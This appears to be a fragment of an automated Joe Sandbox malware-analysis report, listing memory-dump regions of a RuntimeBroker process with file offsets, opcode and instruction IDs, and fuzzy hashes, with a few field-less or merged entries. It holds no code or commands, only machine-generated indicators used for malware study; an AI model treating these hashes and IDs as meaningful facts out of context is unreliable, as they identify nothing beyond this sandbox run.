                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2da5d1b25b01acfb4c7cb89ba9adbbfdca254d4dc98ea587621280ba1f77514f
                                                                                    • Instruction ID: d28297b130939de9d9417372d25b9dd390c519fc17e516a3b7f8663335352f0b
                                                                                    • Opcode Fuzzy Hash: 2da5d1b25b01acfb4c7cb89ba9adbbfdca254d4dc98ea587621280ba1f77514f
                                                                                    • Instruction Fuzzy Hash: B641553170C9488FDF98FF1CC4A5DA5B3E1FB69324B04016AD14AC7292DE29F845DB81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ade9179631be8f3d9f7363f7983c36979465f9055428916fd58580d5e1db873e
                                                                                    • Instruction ID: 63f182aa27ef69a8914b1b409e29359cce84dc8ea3a1fb8733ed8c5bf8bf3f38
                                                                                    • Opcode Fuzzy Hash: ade9179631be8f3d9f7363f7983c36979465f9055428916fd58580d5e1db873e
                                                                                    • Instruction Fuzzy Hash: 4531643160C9488FDF99FF1CC4A5D6573E1FB69314B0401AAD44AC7292DE29F845CB81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: fb36dc8aacfdb005786dbee14c63f507a1fe450422f20ea1d95a77c25fd0db77
                                                                                    • Instruction ID: b566b83c0106b411e3ffd23fc7d2f430ab1f3afab891d48cc0802ad251a1d4a0
                                                                                    • Opcode Fuzzy Hash: fb36dc8aacfdb005786dbee14c63f507a1fe450422f20ea1d95a77c25fd0db77
                                                                                    • Instruction Fuzzy Hash: E7317E3160C9488FCB99FB18C4A5EA4B3E1FBA9314B0402AED04AC7292CE25FC45DB81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 144b195acf00f3a9c6f2e5a3147dd1accc3726441dedea85f6f263db179e8fb1
                                                                                    • Instruction ID: 8cd973c37b4b8ed619cfb4610f1a16eba33c88d2a0fa667240dab3662347936f
                                                                                    • Opcode Fuzzy Hash: 144b195acf00f3a9c6f2e5a3147dd1accc3726441dedea85f6f263db179e8fb1
                                                                                    • Instruction Fuzzy Hash: C531507160C9498FDF98FF18C4A5EA4B3E1FBA9314B04016ED04EC7292DE29F845DB81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a8d3db3b13aadc1d867c6857e77af32d9bea8bbec681cafcead6f870345a64b2
                                                                                    • Instruction ID: e14d8760ddfc7b59064ebfba2390fbd9b3814fce6d5536824344d8d9280f9224
                                                                                    • Opcode Fuzzy Hash: a8d3db3b13aadc1d867c6857e77af32d9bea8bbec681cafcead6f870345a64b2
                                                                                    • Instruction Fuzzy Hash: 1D31527170C9498FDF98FF2CC4A5EA5B3E1FBA9314B14016AD04AC7292DE29F845DB81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1c225c106873bd09d4e4681532fce1b9073909cfe56126a797e397744803dc1c
                                                                                    • Instruction ID: 57e57720dd5423e8fb01075bb9ac634fc32e829f16a0212d59ebb1df1581b89b
                                                                                    • Opcode Fuzzy Hash: 1c225c106873bd09d4e4681532fce1b9073909cfe56126a797e397744803dc1c
                                                                                    • Instruction Fuzzy Hash: BE31D671B1D949CFE7E8DF2888A56B837D1FF4A351B04017ED54EC76A2DE28B8069780
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9486eb9bdc4c4a4d403f0b5836aaa6d12aed5d63a9ada7712f73562b99bcf79f
                                                                                    • Instruction ID: 465bbf669435fa1a7667857b41c6933e149f1709d4c79d1c8156036455461325
                                                                                    • Opcode Fuzzy Hash: 9486eb9bdc4c4a4d403f0b5836aaa6d12aed5d63a9ada7712f73562b99bcf79f
                                                                                    • Instruction Fuzzy Hash: 9B312271B199099FDB44DA1CD8A19A9B7A2FF8A310B54413AD14ED3686CF38BC52C7C0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 588598658691a20030ff63e867c799d0f3c6ef506c04bafe71b8da18eeebcb65
                                                                                    • Instruction ID: 5c90fb03c9828c90c158fc3124c1b7728af636edef8f0196a7cd5242db175e8b
                                                                                    • Opcode Fuzzy Hash: 588598658691a20030ff63e867c799d0f3c6ef506c04bafe71b8da18eeebcb65
                                                                                    • Instruction Fuzzy Hash: 6A31AD71B1990A8FDB44DB28C5E29A8F7A1FF5A320B014279D54ED7286CB28BC138780
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e797e9482f4aee0b0ef58a2553b9785fefa946cf4cef47021f50a56afbdd8b63
                                                                                    • Instruction ID: 657b14997c735b17c8601e95c373bcf5d9d0a7c9ec25757b5cf172dce96e153e
                                                                                    • Opcode Fuzzy Hash: e797e9482f4aee0b0ef58a2553b9785fefa946cf4cef47021f50a56afbdd8b63
                                                                                    • Instruction Fuzzy Hash: 07318070E1E6CD9FDB51DB68C8A05AD7BB0FF4B314F0400BAC149E7192DA296809DB91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a89a9f457e55f2c0319d8c81b87d6a59fb274550951e45903da9ee746fe94d33
                                                                                    • Instruction ID: ea921443179797f4a230aa8ace275be8a13b4e2473677f2041472e2dd4a8f6f5
                                                                                    • Opcode Fuzzy Hash: a89a9f457e55f2c0319d8c81b87d6a59fb274550951e45903da9ee746fe94d33
                                                                                    • Instruction Fuzzy Hash: 63317071B0994A8FD744DB58D5E19A8F7A1FF46310B50427AD54ED3686CB28BD128BC0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3526531662.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd343e0000_RuntimeBroker.jbxd
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3526531662.00007FFD343F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd343f0000_RuntimeBroker.jbxd
                                                                                    • Instruction Fuzzy Hash: 9A210432B0E2998FE312EB6898A51DE7FB0EF43324F1845B7C280DB1D2D538158A9781
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3530811333.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd34540000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7e9b9f1302ec387f0ef6958cb293a645ab21fdd52d44d9a80e6a5c10575249f4
                                                                                    • Instruction ID: 92b305c43c9d76f8ec20c58517f73a118594d1bb27f96708f7f60f1153d9ffa7
                                                                                    • Opcode Fuzzy Hash: 7e9b9f1302ec387f0ef6958cb293a645ab21fdd52d44d9a80e6a5c10575249f4
                                                                                    • Instruction Fuzzy Hash: 7C2168B1E099494FDFDCEB0884B5AA4B7E1FB59304B0441BFD14DE7292CE3968859B01
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c8825813460ae2fe77fe90a51c27122194a52e2f7c79e7fc9334efabee18bc62
                                                                                    • Instruction ID: 13dad60a9647576e7483b6f570934bf94f61289001445424d4b8716fce3b6d50
                                                                                    • Opcode Fuzzy Hash: c8825813460ae2fe77fe90a51c27122194a52e2f7c79e7fc9334efabee18bc62
                                                                                    • Instruction Fuzzy Hash: A611BF71B19A0CCFD798DF58D8AA6B9B7E1FF9A310B00426ED14ED72A1CB216801CB40
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c447e872b42848675eb68bd6cbc209abbeedc72a593bb6c6d7961f9d8f22ffe6
                                                                                    • Instruction ID: 66a9b9f2a865a197ad6028dfa1d9d7ba24fac26c3ce1ebe8d6fef8094f3ddd36
                                                                                    • Opcode Fuzzy Hash: c447e872b42848675eb68bd6cbc209abbeedc72a593bb6c6d7961f9d8f22ffe6
                                                                                    • Instruction Fuzzy Hash: A2116D91F6F1C3CEEB655AE416F11B87A406F47610F1802B6DA8EC61C2CC4C394972D2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 404d0028d1b4e919c34f243cfaa70c3a9822bc2a496e549ecf55c68d3ab99f06
                                                                                    • Instruction ID: b98d1fc6951d0fc28c1a57a3d550c068b73e16d6c54176091e63ea417abdd3e1
                                                                                    • Opcode Fuzzy Hash: 404d0028d1b4e919c34f243cfaa70c3a9822bc2a496e549ecf55c68d3ab99f06
                                                                                    • Instruction Fuzzy Hash: BE116B3134964D8FE705CE68E8A86E97B91FB56315F14027FDA4AC31E1CB68A526C7C0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e995e72b96e508a42f37ea3151c0c3ca00267a1373f7702d166c0e7a65f99708
                                                                                    • Instruction ID: be79bcf6bd41a460d51aa6eb57fb7f9d733520212b927c81fd273e3bb6698c05
                                                                                    • Opcode Fuzzy Hash: e995e72b96e508a42f37ea3151c0c3ca00267a1373f7702d166c0e7a65f99708
                                                                                    • Instruction Fuzzy Hash: 3001D671B499488FDB45EBA8A8A16EC77A0FF4A311F45017ED14DE72C3CA2968028780
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3530811333.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd34540000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: aaaae207bb12e42fbd277566c15f15ccb5125e041acc1f8d6d9066884291506a
                                                                                    • Instruction ID: 47621d3431635f1c20d348858c58c027181a025c3d68fba3c5aae33b44d85838
                                                                                    • Opcode Fuzzy Hash: aaaae207bb12e42fbd277566c15f15ccb5125e041acc1f8d6d9066884291506a
                                                                                    • Instruction Fuzzy Hash: 191142B1A099494FDFDCEB48C4B5E60B7E1FB59304B0441BAD15DE7292CD3968899B01
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3526531662.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd343e0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7edb03e22994360e141e2f834e2a56849c75503850f835ca00ed74b6a8d5a8c5
                                                                                    • Instruction ID: 71633ac4c7688aee68c77d964617aacd735d19f0551b20aea7672a14208685e2
                                                                                    • Opcode Fuzzy Hash: 7edb03e22994360e141e2f834e2a56849c75503850f835ca00ed74b6a8d5a8c5
                                                                                    • Instruction Fuzzy Hash: 3B11C232A0E7988FE702EB78D8A42DE7FB0EF43310F1944B7C280DB192D53816898780
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3537780170.00007FFD34900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34900000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd34900000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b32c651c7235a8ba7ff19824b40471a64066826e37a020ca0b6ca0571fcca6c8
                                                                                    • Instruction ID: c74b7c826accf1a1e135716a2edfbc988ced41af3271bd54738915de1d26286e
                                                                                    • Opcode Fuzzy Hash: b32c651c7235a8ba7ff19824b40471a64066826e37a020ca0b6ca0571fcca6c8
                                                                                    • Instruction Fuzzy Hash: 60015B34B1D5068FE31C8708849177973D5FB86704F70423DD54BC628ADA3CB9426D55
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3526531662.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd343e0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: aa88565d334715e60adce184a27fcc1296be9004259e452469743d690529a750
                                                                                    • Instruction ID: 9b26fb760e8ece7771a2b95fe5cc28d312cacfc8ae7bc242b13dd73dc54dd2f1
                                                                                    • Opcode Fuzzy Hash: aa88565d334715e60adce184a27fcc1296be9004259e452469743d690529a750
                                                                                    • Instruction Fuzzy Hash: BF016136A0E7988FE702EB6898A41DE7FB0EF43314F1945E6C680DB192D53856899781
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3526531662.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd343e0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ad2d5dfb5c16a610bad244d69bcc03052962ac035d5815781a7d058aa8efec79
                                                                                    • Instruction ID: fe96c8fc097785a950fe6c19bcb675f5063115ce9d80eaccddae1558944e8ce1
                                                                                    • Opcode Fuzzy Hash: ad2d5dfb5c16a610bad244d69bcc03052962ac035d5815781a7d058aa8efec79
                                                                                    • Instruction Fuzzy Hash: 44012522E5D92D4AEBA4B75884B57BA6190AF46300F5401B5D90DE32D2DD3C6D816740
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f2f3ebd9f8bb8f71b768571a6bcede2e6f85233d046bf5cce07648781cbca48b
                                                                                    • Instruction ID: 9ae5b5c09b0a6f52e9872d559389bd1c043008667c5c0023fb0213eb66c568cc
                                                                                    • Opcode Fuzzy Hash: f2f3ebd9f8bb8f71b768571a6bcede2e6f85233d046bf5cce07648781cbca48b
                                                                                    • Instruction Fuzzy Hash: DF01E87190895C8FCF98EB58C8A4BE877B4EB99315F1401AAD40DE7291DA35AAC5CB80
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a854abd170012c4be46b62017c2fd2bbbfee7c092fb3d6b3799fcadb98572f4b
                                                                                    • Instruction ID: 8a14d041f78da8356232ef54f41838234caa6c875b0f08a44350a97c69d3e620
                                                                                    • Opcode Fuzzy Hash: a854abd170012c4be46b62017c2fd2bbbfee7c092fb3d6b3799fcadb98572f4b
                                                                                    • Instruction Fuzzy Hash: BD017D3130D2868FC706CB28D9B16E57B80EF43314F1406BED945CB2C2C659A515C7C0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bbca5fb98b1b08883692abd2903c8e5a4fc101091b78e50d8de322db2f1e8400
                                                                                    • Instruction ID: 40f492f163122d7c5c87bd42ca6ee3fde3e91e8445b6b546fe267d5bf2a448f8
                                                                                    • Opcode Fuzzy Hash: bbca5fb98b1b08883692abd2903c8e5a4fc101091b78e50d8de322db2f1e8400
                                                                                    • Instruction Fuzzy Hash: 1301EC7190895CCFCF98EF58C8A4BE877B0EB59315F1401A9D40DE7291DA35AAC5CB80
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3526531662.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd343e0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 61904a8d67c1a144fbc8af5c398f45c147b78ed9ee95dec9934e2cf91871fac4
                                                                                    • Instruction ID: 5167e7d99683a8dd349c3c1fdba04ff9f8800a0c6c039a92384512e376f11267
                                                                                    • Opcode Fuzzy Hash: 61904a8d67c1a144fbc8af5c398f45c147b78ed9ee95dec9934e2cf91871fac4
                                                                                    • Instruction Fuzzy Hash: 8EF0C823F4D41A4BEB54F648C4A56FD7391EB90710F094676D40EC72D5DE2CAD8293C0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3526531662.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd343e0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5e9778df4750084cb75aec90f917a2514228f83ca38fe3945c032ecbe2bdda72
                                                                                    • Instruction ID: db96a83b2404d05d4156c18e8f9d65d10326253ad1d7700575b52856a397d9af
                                                                                    • Opcode Fuzzy Hash: 5e9778df4750084cb75aec90f917a2514228f83ca38fe3945c032ecbe2bdda72
                                                                                    • Instruction Fuzzy Hash: 21016D31A9D51E8AEBA4BA44D8A5BF973A0EF15300F5400B9D90ED31A2EE3C2DC25A41
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3526531662.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd343e0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e29c50fa9d688aa280f0ed051006b6d5c8c81f1ea4558d6d1634d8a88d54206b
                                                                                    • Instruction ID: 734d2c5e21db0d8c14baac1b955bb65203b8da64f1ccef26ce2d9e41e6ff3127
                                                                                    • Opcode Fuzzy Hash: e29c50fa9d688aa280f0ed051006b6d5c8c81f1ea4558d6d1634d8a88d54206b
                                                                                    • Instruction Fuzzy Hash: FB019E32A0E3888FD702EB68C8941DEBFB0EF03314F1945EAC180DB292D5385A88C781
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 48a2293e31f07e81d6644c326eabd9ed17423f6c475c5dd6dcfd0d20221c4be1
                                                                                    • Instruction ID: 4b9945470c2d17cf450a0b0a321dce52d4cfac2b76c4b6df7a764a00e2690e64
                                                                                    • Opcode ID: 900fe70b819421745e4b4d75626da07f78d276a3c8375ed78851615b9ea59be2
                                                                                    • Instruction ID: f82b15cf4566523a7950caa2f1db4320d5d2b73e3e455da6e6d7941920eba9ac
                                                                                    • Opcode Fuzzy Hash: 900fe70b819421745e4b4d75626da07f78d276a3c8375ed78851615b9ea59be2
                                                                                    • Instruction Fuzzy Hash: 29B01201DD744F00A84431BA18D20A670505B46100FC80070E70CC1185986D10D52252
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e0f385657c03c4a8835d62902beb2d1b481880570f86c5dfef95860fbeaa1c62
                                                                                    • Instruction ID: 895cad2487376738625a525a06445cf599bf6567383a6e5a4099299a27bd3bb4
                                                                                    • Opcode Fuzzy Hash: e0f385657c03c4a8835d62902beb2d1b481880570f86c5dfef95860fbeaa1c62
                                                                                    • Instruction Fuzzy Hash: 27C04C54F1E243DBE721966448E153826910F07205B5505B1D317CA2D3DCEC784872D1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3534445171.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd347d0000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: dc45114f0a97db062a11a6099a2b65d04da59897f16541c1f900598dfd7e4ff4
                                                                                    • Instruction ID: 4ca24ba71510d6f50c0ea728fbd2d2d21d0aa53b7245a278bd93e4d89ab0dbbc
                                                                                    • Opcode Fuzzy Hash: dc45114f0a97db062a11a6099a2b65d04da59897f16541c1f900598dfd7e4ff4
                                                                                    • Instruction Fuzzy Hash: 89C04C80F1E38696A62115A405E10BC36900B172047550575D206C51C7D84D79096291
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3537780170.00007FFD34900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34900000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd34900000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cf0e64bb519b10ae7b66bf6e7cc8a0ce8774ef9b0a7fb8339891258614a5fc60
                                                                                    • Instruction ID: 153afb383dbbb6a7b7bb88e580eaae034d3e73b18429a5a0d6998616fd831bf1
                                                                                    • Opcode Fuzzy Hash: cf0e64bb519b10ae7b66bf6e7cc8a0ce8774ef9b0a7fb8339891258614a5fc60
                                                                                    • Instruction Fuzzy Hash: 44A00208D9780A01981932FA1DE70D474909BCA118FC71561EE18D0286E88E15E91393
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3537780170.00007FFD34900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34900000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd34900000_RuntimeBroker.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $$.$;$R$U
                                                                                    • API String ID: 0-1005035953
                                                                                    • Opcode ID: 47d254148e0f093f5786f582ccf5dc6f24e9ebf3db524418e38fa012f6a1d4b2
                                                                                    • Instruction ID: 3473a2bc98db7f1562233505ea111cad128bf43462297e14ee08b69c65880885
                                                                                    • Opcode Fuzzy Hash: 47d254148e0f093f5786f582ccf5dc6f24e9ebf3db524418e38fa012f6a1d4b2
                                                                                    • Instruction Fuzzy Hash: D711263490D6814FF33547289894B7277A0FF47310F2141FED9AEC71D7D86C284A92A2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.3526531662.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
